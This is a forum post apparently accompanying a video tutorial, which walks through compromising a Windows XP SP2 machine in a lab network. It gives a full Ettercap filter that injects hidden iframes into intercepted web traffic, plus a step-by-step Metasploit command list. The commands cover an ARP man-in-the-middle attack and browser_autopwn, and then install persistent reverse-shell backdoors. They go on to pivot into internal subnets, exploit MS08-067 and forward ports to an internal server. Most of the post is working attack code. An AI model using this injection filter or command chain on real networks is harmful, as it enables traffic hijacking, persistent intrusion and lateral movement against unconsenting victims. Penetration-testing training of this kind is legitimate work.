Results 1 to 2 of 2

Thread: [Video] Owning Windows (XP SP2 vs. Metasploit's browser_AutoPWN)

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Owning Windows (XP SP2 vs. Metasploit's browser_AutoPWN)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4654173/
    Download video:
    http://www.mediafire.com/?8ccnw93h6skqbas
    Download Script (iFrame_v2.zip): http://www.mediafire.com/?8mlgidgxlkv76qn


    Brief Overview
    This screencast starts off by carrying out a “Man In The Middle” (MITM) attack, to inject traffic making the target vulnerable to “Cross Site Scripting” (XSS) which is linked to Metasploit's “Browser_AutoPWN” feature.
    Upon being compromised, the attacker chooses to explore and exploit other devices which are attached to the internal network (Pivoting). To finalise, the attacker gains access to view the internal server via “Port Forwarding”.
    The attacker also installs backdoors into the network, allowing them to connect back at any stage.


    Scenario/Setup
    This is the second video in a series of attacking Operating Systems and our target has now updated to Windows XP Service Pack 2, in the aid of seeking better security, after becoming compromised previously.




    What do I need?

    • Ettercap – (Can be found on BackTrack 4-R2)
    • iFrame.filter (Can either be downloaded from “links” at the top or manually created from the code below)
    • Metasploit – (Can be found on BackTrack 4-R2)
    • Internet Browser – (Firefox can be found on BackTrack 4-R2)
    • Text Editor – (Kate can be found on BackTrack 4-R2)


    iFrame.filter
    Code:
    ########################################################################
    # iFrame.filter v2   --- Ettercap Filter (iFrame injection)            #
    # g0tmi1k 2011-03-09 --- 7x 192.168.0.33 <--- including this one!      #
    ########################################################################
    if (ip.proto == TCP && ip.dst != "192.168.0.33") {                 # If traffic is TCP protocol and its not coming to us....
       if (search(DATA.data, "gzip")) {                                # ...and if it contains an gzip in its header:
          replace("gzip", "    ");                                     # Ask the server not to encode packets - only use plain text ;) *Four spaces to match original string*
          msg("[*] Zapped 'gzip'\n");                                  # Let us know it's been done (=
       }
       if (search(DATA.data, "deflate")) {
          replace("deflate", "       ");
          msg("[*] Zapped 'deflate'\n");
       }
       if (search(DATA.data, "gzip,deflate")) {
          replace("gzip,deflate", "            ");
          msg("[*] Zapped 'gzip,deflate'\n");
       }
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          msg("[*] Zapped 'Accept-Encoding'\n");
       }
    #-----------------------------------------------------------------------
       if (search(DATA.data, "</title>")){                                                                                          # Is there something for us to inject into?
          replace("</title>","</title><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");   # ...Insert our iframe to the webpage!
          msg("[>] Injecting into (</title>)\n");                                                                                   # Let us know we have done it (=
       }
       if (search(DATA.data, "</TITLE>")){
          replace("</TITLE>","</TITLE><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (</TITLE>)\n");
       }
       if (search(DATA.data, "body>")){
          replace("body>","body><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (body>)\n");
       }
       if (search(DATA.data, "BODY>")){
          replace("BODY>","BODY><iframe src=\"http://192.168.0.33\" width=\"0\" height=\"0\" frameBorder=\"0\"></iframe>");
          msg("[>] Injecting into (BODY>)\n");
       }
    
       if (search(DATA.data, "http://192.168.0.33")){                  # ...and search data, to test for our 'tweak' ;)
          msg("[+] Injected correctly!\n");                            # Let us know it's been done
       }
    }
    Method
    • Start network services, obtain an IP address and start PostgreSQL
    • Start metasploit and configure browser_autopwn to allow browser exploits
    • Setup Ettercap, prepare and compile filter
    • Once metasploit is ready, perform an ARP MITM attack
    • Wait for target to visit a web page
    • When a sessions has been establish, create a backdoor
    • Collect information on target
    • Start pivoting and scanning for other nodes
    • Perform a remote exploit
    • Create a backdoor, collect information, start pivoting and scanning... again
    • Once web server has been detected, port forward allowing for target to view content
    • Game Over



    Commands
    Code:
    start-network
    dhclient eth0
    /etc/init.d/postgresql-8.3 start
    clear
    
    msfconsole
    search autopwn
    use server/browser_autopwn
    show options
    set LHOST 192.168.0.33
    set SRVPORT 80
    set URIPATH /
    show options
    run
    
    kate /etc/etter.conf -> ec_uid = 0 -> ec_gid = 0 -> redir_command_on -> redir_command_off -> Save
    cat iFrame.filter
    etterfilter iFrame.filter -o iFrame.ef
    ettercap -T -q -i eth0 -F iFrame.ef -M ARP // // 
    
    ettercap -> q
    
    sessions -l -v
    sessions -i 1
    sysinfo
    run persistence -X -i 5 -p 445 -r 192.168.0.33
    reboot
    
    search handler
    use multi/handler
    show options
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.0.33
    set LPORT 445
    show options
    exploit -j
    
    jobs
    kill 0
    jobs
    
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    run checkvm
    ipconfig
    
    run get_local_subnets
    run autoroute -p 
    run autoroute -s 10.0.0.0/8
    run autoroute -p
    
    run arp_scanner -r 10.0.0.0/24
    background
    search portscan
    use scanner/portscan/tcp
    show options
    setg RHOSTS 10.0.0.101
    setg PORTS 80,137,139,445
    setg THREADS 50
    show options
    run
    
    search ms08_067_netapi
    use windows/smb/ms08_067_netapi
    show options
    set RHOST 10.0.0.101
    set PAYLOAD windows/meterpreter/bind_tcp
    set LPORT 4445
    show options
    exploit
    
    run metsvc
    exit
    
    search handler
    use multi/handler
    show options
    set PAYLOAD windows/metsvc_bind_tcp 
    set LPORT 31337
    set RHOST 10.0.0.101
    show options
    exploit
    
    sysinfo
    getuid
    ipconfig
    
    run get_local_subnets
    run autoroute -p
    run autoroute -s 172.16.0.0/12
    run autoroute -p 
    
    run arp_scanner -r 172.16.0.0/24
    background
    use scanner/portscan/syn
    show options
    set RHOSTS 172.16.0.33
    set PORTS 80,137,139,445
    set THREADS 50
    show options
    run
    
    sessions -l 
    sessions -i 4
    portfwd
    portfwd add -l 8080 -p 80 -r 172.16.0.33
    portfwd
    
    firefox localhost:800
    Last edited by g0tmi1k; 03-09-2011 at 11:06 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Owning Sever through Local File Include
    By spawn in forum BackTrack Videos
    Replies: 1
    Last Post: 03-08-2011, 06:13 PM
  2. Replies: 5
    Last Post: 03-07-2011, 12:18 AM
  3. Replies: 21
    Last Post: 03-02-2011, 07:06 PM
  4. Owning a Windows XP with a shared folder.
    By sickness in forum BackTrack Videos
    Replies: 6
    Last Post: 02-12-2011, 02:56 AM
  5. Metasploit Browser_autopwn module error, need help
    By cgelici in forum Beginners Forum
    Replies: 0
    Last Post: 11-23-2010, 02:48 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •